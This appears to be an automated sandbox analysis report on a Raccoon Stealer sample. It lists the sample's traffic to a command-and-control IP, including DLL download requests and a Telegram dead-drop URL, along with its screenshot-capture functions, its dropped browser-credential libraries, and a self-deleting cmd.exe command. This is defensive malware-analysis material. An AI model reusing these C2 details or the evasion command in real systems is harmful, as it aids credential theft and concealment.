Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: unknown TCP traffic detected without corresponding DNS query: 185.138.164.150
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327260135.0000000002DB2000.00000004.00000001.sdmp String found in binary or memory: http://185.138.164.150/
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323065453.0000000002DB2000.00000004.00000001.sdmp String found in binary or memory: http://185.138.164.150/;r
Source: softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: softokn3.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: nssckbi.dll.1.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: nssckbi.dll.1.dr String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: softokn3.dll.1.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: softokn3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: softokn3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: nssckbi.dll.1.dr String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://ocsp.accv.es0
Source: softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: softokn3.dll.1.dr String found in binary or memory: http://ocsp.thawte.com0
Source: nssckbi.dll.1.dr String found in binary or memory: http://policy.camerfirma.com0
Source: nssckbi.dll.1.dr String found in binary or memory: http://repository.swisssign.com/0
Source: softokn3.dll.1.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: softokn3.dll.1.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: softokn3.dll.1.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.accv.es00
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.chambersign.org1
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: mozglue.dll.1.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: softokn3.dll.1.dr String found in binary or memory: http://www.mozilla.com0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.quovadis.bm0
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: sqlite3.dll.1.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: nssckbi.dll.1.dr String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
Source: nssckbi.dll.1.dr String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: nssckbi.dll.1.dr String found in binary or memory: https://repository.luxtrust.lu0
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.305167317.0000000002D36000.00000004.00000001.sdmp, SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327229599.0000000002D2C000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.305167317.0000000002D36000.00000004.00000001.sdmp, SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327229599.0000000002D2C000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp String found in binary or memory: https://t.me/agrybirdsgamerept
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp String found in binary or memory: https://telegram.org/img/t_logo.png
Source: nssckbi.dll.1.dr String found in binary or memory: https://www.catcert.net/verarrel
Source: nssckbi.dll.1.dr String found in binary or memory: https://www.catcert.net/verarrel05
Source: softokn3.dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323052701.0000000002DA0000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0:
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323052701.0000000002DA0000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0th
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323052701.0000000002DA0000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowser=0de
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.303944597.0000000002D3E000.00000004.00000001.sdmp, 1xVPfvJcrg.1.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.138.164.150
Source: unknown DNS traffic detected: queries for: t.me
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
Source: global traffic HTTP traffic detected: GET //l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: global traffic HTTP traffic detected: GET //l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.138.164.150
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49744 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality to record screenshots
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0042C157 __EH_prolog,GdiplusStartup,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,_mbstowcs,GdipSaveImageToFile,DeleteObject,GdiplusShutdown, 1_2_0042C157

E-Banking Fraud:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326614932.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.297061443.0000000002200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe PID: 7124, type: MEMORYSTR

System Summary:

barindex
Uses 32bit PE files
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0040E139 1_2_0040E139
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0043E2E4 1_2_0043E2E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0042A2F9 1_2_0042A2F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0043628C 1_2_0043628C
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0042C383 1_2_0042C383
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00410648 1_2_00410648
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_004206DD 1_2_004206DD
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0040CF54 1_2_0040CF54
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_004210B1 1_2_004210B1
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0040F2E6 1_2_0040F2E6
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_004373C6 1_2_004373C6
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0040D684 1_2_0040D684
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00437819 1_2_00437819
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0041FD36 1_2_0041FD36
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0040BF59 1_2_0040BF59
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0041E014 1_2_0041E014
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0042E110 1_2_0042E110
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0044A480 1_2_0044A480
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0045A4BD 1_2_0045A4BD
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_004484BA 1_2_004484BA
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0045A5DD 1_2_0045A5DD
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0046475B 1_2_0046475B
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_004187EC 1_2_004187EC
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0041E857 1_2_0041E857
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0041EBE9 1_2_0041EBE9
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_00422D2B 1_2_00422D2B
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: String function: 0044F0F9 appears 41 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: String function: 00467790 appears 100 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: String function: 00440940 appears 35 times
PE file does not import any functions
Source: api-ms-win-core-handle-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-string-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-2-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-sysinfo-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-memory-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-utility-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-environment-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-heap-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-process-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l2-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-string-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-profile-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-file-l1-2-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-libraryloader-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-localization-l1-2-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-time-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-locale-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-namedpipe-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-filesystem-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-multibyte-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-stdio-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-util-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-math-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-private-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-processenvironment-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-interlocked-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-heap-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-synch-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-conio-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-core-timezone-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Source: api-ms-win-crt-convert-l1-1-0.dll.1.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.328077326.000000006E63B000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000003.323091495.0000000002DC9000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327485031.000000006E502000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs SecuriteInfo.com.W32.AIDetect.malware1.14529.exe
PE file contains strange resources
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
PE file contains more sections than normal
Source: sqlite3.dll.1.dr Static PE information: Number of sections : 18 > 10
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Virustotal: Detection: 33%
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe ReversingLabs: Detection: 37%
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe'
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/67@1/2
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Code function: 1_2_0042A224 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree, 1_2_0042A224
Source: softokn3.dll.1.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, sqlite3.dll.1.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, sqlite3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, sqlite3.dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, sqlite3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.1.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: sqlite3.dll.1.dr Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327846599.000000006E600000.00000002.00020000.sdmp, nss3.dll.1.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
